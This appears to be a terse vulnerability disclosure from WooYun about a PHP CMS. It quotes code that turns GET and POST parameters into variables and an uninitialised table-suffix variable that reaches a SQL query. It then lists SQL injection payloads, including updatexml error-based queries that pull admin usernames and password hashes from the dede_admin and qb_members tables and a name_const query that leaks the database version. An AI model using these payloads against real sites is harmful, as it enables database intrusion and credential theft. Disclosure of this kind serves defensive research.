WooYun.org

foreach($_COOKIE AS $_key=>$_value){
	unset($$_key);
}
foreach($_POST AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];
}

$postdb['list']=$timestamp;
	if($iftop){		//推荐置顶
		@extract($db->get_one("SELECT COUNT(*) AS NUM FROM `{$_pre}content$_erp` WHERE list>'$timestamp' AND fid='$fid' AND city_id='$postdb[city_id]'"));  //此处_erp未初始化
		if($webdb[Info_TopNum]&&$NUM>=$webdb[Info_TopNum]){
			showerr("当前栏目置顶信息已达到上限!");
		}
		$postdb['list']+=3600*24*$webdb[Info_TopDay];
		if($lfjdb[money]<$webdb[Info_TopMoney]){
			showerr("你的积分不足:$webdb[Info_TopMoney],不能选择置顶");
		}
		$lfjdb[money]=$lfjdb[money]-$webdb[Info_TopMoney];	//为下面焦点信息做判断积分是否足够
	}

and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

SELECT 1 FROM dede_admin WHERE updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a
,MID(pwd,4,16),0x5d) FROM dede_admin),1);

where (SELECT 1 FROM qb_members WHERE updatexml(1,(SELECT CONCAT(0x5b,username,0x3a,MID(password,4,16),0x5d) FROM qb_members limit 0,1),1))